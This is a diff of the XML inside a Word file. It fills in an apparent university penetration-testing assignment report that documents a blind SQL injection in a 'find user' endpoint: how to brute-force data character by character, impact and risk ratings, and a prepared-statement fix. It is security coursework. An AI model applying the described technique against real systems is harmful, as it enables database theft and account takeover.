-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6150" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1365" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6150" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1365" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6150" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="100" w:type="dxa"/>
-              <w:left w:w="100" w:type="dxa"/>
-              <w:bottom w:w="100" w:type="dxa"/>
-              <w:right w:w="100" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t xml:space="preserve">SQL </w:t>
+            </w:r>
+            <w:r>
+              <w:t>w</w:t>
+            </w:r>
+            <w:r>
+              <w:t>i</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ld</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">card </w:t>
+            </w:r>
+            <w:r>
+              <w:t>a</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ttack</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> vulnerability present in the</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> API</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> for traini</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ngs</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3170,7 +4860,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc69927388"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71299207"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -3188,9 +4878,18 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc69927389"/>
-      <w:r>
-        <w:t>Finding 1 - Brief description in title</w:t>
+      <w:bookmarkStart w:id="3" w:name="_Toc71299208"/>
+      <w:r>
+        <w:t xml:space="preserve">Finding 1 - </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>injection vulnerability present in finding user functionality</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
@@ -3229,11 +4928,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc69927390"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="4" w:name="_Toc71299209"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -3267,8 +4967,194 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
-            </w:r>
+              <w:t xml:space="preserve">A data breach may occur due to a </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SQL injection vulnerability</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in the web application’s </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>finding user</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> functionality, which leads to full account takeover, resulting in potential loss of personally identifiable information (PII) and unauthorised actions.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>A</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">n attacker can inject malicious SQL statements via the finding user API endpoint and identify whether a statement can </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>fetch any data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>back</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or not </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>from its response</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>In this way, although the attacker will not be able to read out the data directly from one response, same information can be constructed by brute-forcing each character through repeated requests.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> This will result in severe data breach as a </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>malicious user</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> is able to read the whole database within no time</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>he exploitation requires the attacker to login first so if only staff have the access to the portal, the likelihood it happens will significantly decreases.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3287,18 +5173,21 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="5" w:name="_Toc69927391"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71299210"/>
+            <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="5"/>
+            <w:bookmarkEnd w:id="6"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3325,8 +5214,92 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
-            </w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>This</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> vulnerability </w:t>
+            </w:r>
+            <w:r>
+              <w:t>can be exploited when</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> an authenticated user </w:t>
+            </w:r>
+            <w:r>
+              <w:t>interacts with the finding user API endpoint (</w:t>
+            </w:r>
+            <w:hyperlink r:id="rId9" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>http://assignment-hermes.unimelb.life/find-user.php?username=</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>with</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> appending some</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>formatted SQL query</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> to it.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">The API will return “true” when the query </w:t>
+            </w:r>
+            <w:r>
+              <w:t>fetches something back. By taking advantage of such, an attacker can construct anything they want from the database by brute-forcing each character</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> one by one</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">. For a detailed walkthrough, see </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Section_1_–" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 2, Section 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3345,18 +5318,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="6" w:name="_Toc69927392"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="7" w:name="_Toc71299211"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="6"/>
+            <w:bookmarkEnd w:id="7"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3381,44 +5355,39 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Negligible/Minor/Moderate/Major/</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Catastrophic</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">An attacker could do </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">Major: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">An attacker could </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>obtain login credentials for all users and precede to authenticate into each one, stealing PII, and performing actions on their behalf (such as updating their profile). However, users are restricted to only querying the database, and not modifying or deleting contents. This means, at most, all an attacker could do would be to steal PII and “request” changes to a victim user’s profile, as for this attack to be successful, an</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>attacker must already hold one set of credentials.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3438,18 +5407,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc69927393"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="8" w:name="_Toc71299212"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="7"/>
+            <w:bookmarkEnd w:id="8"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3475,14 +5445,45 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Possible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Inputs in web applications are the most likely to be exploited by attackers while exploiting this vulnerability requires the attacker to have a set of login credentials.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Therefore,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>overall likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3502,18 +5503,20 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc69927394"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="9" w:name="_Toc71299213"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="8"/>
+            <w:bookmarkEnd w:id="9"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3538,30 +5541,52 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">Informational / </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Referring to </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>, possible likelihood and major impact suggest a high risk. A data breach to one of the business systems will be a great damage to the company’s reputation, especially for one that services banks and telecommunication companies who</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> always</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>put security at the first place.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3581,18 +5606,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc69927395"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="10" w:name="_Toc71299214"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="9"/>
+            <w:bookmarkEnd w:id="10"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3618,14 +5644,36 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[1] Assignment 1 sample report</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>[2] Lecture 5 - SQLi slides</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3645,18 +5693,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc69927396"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="11" w:name="_Toc71299215"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="10"/>
+            <w:bookmarkEnd w:id="11"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3672,6 +5721,51 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="3"/>
+              </w:numPr>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>U</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>se prepared statements instead of string concatenation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> [2]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>. For example:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
               <w:widowControl w:val="0"/>
               <w:pBdr>
                 <w:top w:val="nil"/>
@@ -3681,9 +5775,284 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
